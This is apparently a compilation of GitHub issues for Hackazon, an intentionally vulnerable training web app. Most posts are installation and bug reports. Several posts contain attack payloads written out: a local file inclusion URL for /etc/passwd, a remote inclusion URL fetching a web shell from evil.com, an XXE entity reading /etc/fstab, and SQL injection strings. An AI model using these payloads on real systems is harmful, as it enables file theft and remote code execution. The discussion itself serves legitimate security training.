In your practise application you have misclassified LFI as RFI.

on https://github.com/rapid7/hackazon/blob/master/VULNERABILITIES.md

you say:

Remote File Include:

RFI Injection allows to use an app logic where the app includes some file based on user input. In our app it's implemented in the Help Articles section:

http://hackazon.dev/account/help_articles?page=add_product_to_cart
Vulnerability can be used as such:

http://hackazon.dev/account/help_articles?page=/etc/passwd%00

This is pulling a local file, and the vuln present is LFI not RFI.

RFI would be using the script to pull in external content like a flash plugin or a text file from an external server that then gets parsed and included in-line to exploit either the user or the system. Like so:

http://hackazon.dev/account/help_articles?page=http://evil.com/shell.txt

the value of which would be a web shell like so:

Im using a ubuntu 14.04 LTS server and i'm trying to configure hackazon. Everytime a browse to localhost/hackazon/web/, it's redirects to /install and display's a 404 error. Please help?

Error 42S02: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'hackazon.tbl_product_options_values' doesn't exist

I use Ubuntu 16.04.2 LTS minimal server to install hackazone. After login i found some error like this in admin page

Fatal error: Uncaught Error: Call to a member function getClassAnnotation() on null in /var/www/hackazon/modules/vulninjection/classes/VulnModule/AnnotationReader.php:51 Stack trace: #0 /var/www/hackazon/modules/vulninjection/classes/VulnModule/Config/ContextMetadataFactory.php(88): VulnModule\AnnotationReader->getClassAnnotation('App\Controller\...', 'VulnModule\Conf...') #1 /var/www/hackazon/modules/vulninjection/classes/VulnModule/Config/Context.php(741): VulnModule\Config\ContextMetadataFactory->getMetadata('account', 'orders', 'web') #2 /var/www/hackazon/modules/vulninjection/classes/VulnModule/VulnerabilityMatrixRenderer.php(106): VulnModule\Config\Context->getURL() #3 /var/www/hackazon/modules/vulninjection/classes/VulnModule/VulnerabilityMatrixRenderer.php(85): VulnModule\VulnerabilityMatrixRenderer->calculateVulnMatrix(Object(VulnModule\Config\Context), 3) #4 /var/www/hackazon/modules/vulninjection/classes/VulnModule/VulnerabilityMatrixRenderer.php(85): VulnModule\VulnerabilityMatrixRenderer->calculateVulnMatr in /var/www/hackazon/modules/vulninjection/classes/VulnModule/AnnotationReader.php on line 51

Some body help me??

Been messing around a bit, eventually got it so far as to react.
Now I'm stuck at this issue.
I type in localhost address and get automatically redirected to "localhost/install" showing that URL was not found.

Please help

Followed the precise installation notes + manual
Logged in to hackazon.lc and followed the steps
When I click INSTALL

I get 503 Service Temporarily Unavailable - following installation

DB is created but remained empty

Hello

I installed Hackazon ova file and would like to edit FAQ at Admin dashboard.
But, I always get "503 Service Temporarily Unavailable" when I click "Add"

Does anyone know what exactly the issue is ?

Thanks

Hello,

I observed this issue on several pages of Hackazon. For instance, in the admin page, when I tried to add a new user, I have this return code.
in general, when I sent POST request, I receive this 503 HTTP code

Do you know if this is "as design" or a bug?

kind regards,

As I'm saying in the title, if you inject a malformed sql injection that makes to crash the PHP process, on the URL http://domain.com/product/view?id=81 and the param 'id', it will cotinuously crash on every Home page load.

I had to delete cookies to be able to visit the home after the bad injection because I was crashing just loading the Home.

A solution is to store products that by its query returned true, not only all the data in the id param requested, because it saves the malformed sql injection that belongs to the learning process.

For example: http://vuln2.devo.com/product/view?id=81' and 1=1
without comment at the end

Hi,

When I try to import demo_database.sql I have the following error :

hackazon_db_1 | ERROR 1452 (23000) at line 5: Cannot add or update a child row: a foreign key constraint fails (hackazon.tbl_enquiries, CONSTRAINT tbl_enquiries_ibfk_1 FOREIGN KEY (created_by) REFERENCES tbl_users (id) ON DELETE CASCADE ON UPDATE CASCADE)

Full Docker logs: db_error.txt

Can you help me with this ?

The DB is working on this Docker image : https://github.com/PierrickV/hackazon

Thanks

I was able to Successfully Install Hackazon with MySQL DB on apache Web Server.

I am able to access the Hackazon Index Page Successfully but On Traversing to different Products in the website Seeing Request URL Not Found Error. Please find attached the Screenshot for reference

I am not sure should I need to create product directories on base path or I am not sure what am I missing. Any Help here would help for my better testing.

Thanks
Srikanth

Is the hackazon.apk opensource and free to test for bugs

Hi,

Could you provide a docker-compose to install/deploy Hackazon ?
it will be way more handy than manual steps or than using the OVA.

Last commit seems from three years ago.
Besides, this project is based on PHP 5.x , not PHP 7.x.
That's not "modern".
Thanks!

Hi,

I'm currently working on a Docker image for Hakazon and I have this error when initializing the DB:
hackazon_db_1 | ERROR 1067 (42000) at line 41: Invalid default value for 'created_at'
Full output : hackazon_db_output.txt

The image is here :
https://github.com/PierrickV/hackazon

You can start the container it by using :
docker-compose up

Thanks for your help

XXE vulnerabilities seem not to be function.

I have verified that in XXE is enabled in the vulnerabilities.md file, I have also logged in to the admin page and ensured that there are pages with the XXE vulnerability was enabled. I turned it on every location that I could, just in case. I verified the PHP files in the config location to ensure the the XXE was set to true for the location I was needing. I enabled XXE for the Cart/View area.

I setup BURP to intercept the HTTP GET requests, and I capture the code below

---ORGINAL CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1
---END OF CODE---

I modified the code to have the XML example code in the vulnerability

---MODIFIED CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1

<'?xml version="1.0" encoding="utf-8"?>
<'!DOCTYPE roottag [<'!ENTITY goodies SYSTEM "file:///etc/fstab">]>
<'roottag>&goodies;
---END OF CODE---

NOTE: I added ' at the start of each line to allow the code to display correctly in the note. In the real example, the ' was removed.

I have also modified the goodies to see if the PASSWD file would display.

I only get a HTML 400 return error.

I have clearing the cache, I have tried doing this is a VM with no other content, I ensure that firefox was updated.

Has anyone tested and/or seen XXE vulnerabilities function with hackazon?

If i try to create a new product i get an undefined method error.
Path: admin/product/new

Fatal error: Call to undefined method App\Admin\Controller\Product::getRoleOptions() in /var/www/html/classes/App/Admin/Controller/Product.php on line 184

Hi All

Just wondering about the current master...

It seems like the default vulnerabilities are hit and miss. As an authenticated user, for instance, one command injection works. SQL Injections don't seem to work (some, not all), although HTTP error is returned. It's not set to blind, so I am not sure if this is the expected bahaviour or something is not working well in there.

For example, adding SQL injection to any search page fields doesn't seem to work on my installation.

Any advise would be great. Thanks!

After installing all the repos, tried accessing http://localhost/install and it throws an error as following.

Fatal error: Call to undefined function bcpow() in /var/www/hackazon/vendor/gwtphp/gwtphp/src/util/TypeConversionUtil.class.php on line 207

Any help?

Thank you

I followed the installation instruction mentioned in this link: https://renouncedthoughts.files.wordpress.com/2017/02/hackazon_users_guide.pdf and https://github.com/rapid7/hackazon/wiki

Everything went well but when access web url for installation, it failed saying 404 Not Found. I also don't see install directory in /hackazon/web path

Below is the output of composer.phar installation which I am not sure whether the required packages have installed.
root@WAFBackendServer1:/var/www/html/hackazon# php composer.phar install
Do not run Composer as root/super user! See https://getcomposer.org/root for details
Loading composer repositories with package information
Installing dependencies (including require-dev) from lock file
Nothing to install or update
Generating autoload files

Also below is the Error Screenshot of Browser Access of Web for Hackazon Installation:

Let me know if more information is needed

I went to download the .ova file linked on the Wiki, but when I went to grab the IP using ifconfig it looks like the network interface is disabled (just loppback displays). I thought that it was something on my end using VirtualBox, but I was able to download and bridge other VMs without an issue. I was even able to manually install Hackazon onto Ubuntu 14 and get it running in VirtualBox, so it makes me think that something is wrong with the .ova file.

Here is an error that I got on startup:

And here is the output when I run ifconfig

Is this just an issue on my part or is anyone else able to confirm this?

Using Kali, installed Hazkazon via terminal. All went well according to install instructions but when I click on continue installation it just brings me to my default installation page displaying Apache2 instead of the install wizard. Can anyone help? Thank you